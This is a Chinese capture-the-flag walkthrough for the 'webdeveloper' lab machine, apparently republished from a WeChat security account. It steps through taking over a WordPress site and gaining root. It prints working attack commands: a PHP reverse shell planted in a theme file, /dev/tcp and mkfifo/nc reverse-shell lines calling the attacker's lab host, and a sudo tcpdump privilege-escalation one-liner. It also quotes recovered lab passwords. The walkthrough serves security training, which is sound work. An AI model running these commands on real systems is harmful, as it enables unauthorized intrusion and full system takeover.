webdeveloper靶机详解
-
信息搜集 -
主机发现 -
端口检测 -
目录扫描 -
wireshark -
漏洞利用 -
木马注入(未成功) -
反弹shell -
ssh连接 -
提权
信息搜集
主机发现
端口检测
目录扫描
访问网站,发现有个登录框网页
因为是wordpress登录页面,对其进行爆破
得到用户名是webdeveloper,因为密码字典太大了,不容易爆破,看看其他的有没有有效信息
wireshark
在目录扫描中发现一个有效目录
http://192.168.213.159/ipdata/
因为wordpress登录基本都是post请求包,我们只用分析这些就好了
得到用户账户webdeveloper 密码Te5eQg&4sBS!Yr$)wf%(DcAd
漏洞利用
木马注入(未成功)
插入一句话木马
在plugins处插入一句话木马,文件顺利保存
但蚁剑连接不上。放弃
反弹shell
在Appearance页面的editor的404.php处可以插入php反弹shell源代码(在kali的/usr/share/webshells/php中)
插入的时候会有这样的报错
我们换一个模板再对其进行插入
然后再把这个模板激活,那如何触发404.php呢,需要我们访问一个不存在的页面,,kali开启监听,成功反弹shell
该终端只有python3,美化一下终端
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh连接
我们不知道该账户密码,所以不能用sudo -l,我们可以看一下有没有mysql进程,或者find找一下有root权限的文件,但并无有效信息
ps -aux|grep mysqlfind / -user root -perm /40002>/dev/null
我们还可以进入网站根目录,看看是否可以找到配置文件,这里面可能存有账户密码
cd /var/www/htmlcat wp-config.php
果然有 账户 webdeveloper 密码MasterOfTheUniverse,试试mysql连接
mysql -h localhost -u webdeveloper -p MasterOfTheUniverse
连接不上,不知道为啥,再试试ssh连接
既然知道密码,我们sudo -l试一下
提示到这,那我们就可以进行/tcp/dump提权
提权
在提权网站上搜到如下脚本
COMMAND='id'TF=$(mktemp)echo"$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
一直回显不出来,换个网卡试试
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
有回显,那说明命令没问题,并且返回root,尝试获取shell
COMMAND='/bin/bash'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
回显不出来,那我们反弹shell试一下
COMMAND='/bin/bash -i >& /dev/tcp/192.168.213.154/6666 0>&1'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
这个也不行,靶机上也没有nc- e选项,试试rm
COMMAND='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.213.159 6666 >/tmp/f'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
这个也没有回显。再想想。刚才我们不是在一个网页添加了一个反弹shell代码吗?我们执行一下那个代码不就行了
COMMAND='php /var/www/html/wp-content/themes/twentyfifteen/404.php'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
注意kali开启监听
成功提权
原文始发于微信公众号(泷羽Sec-山然):webdeveloper靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论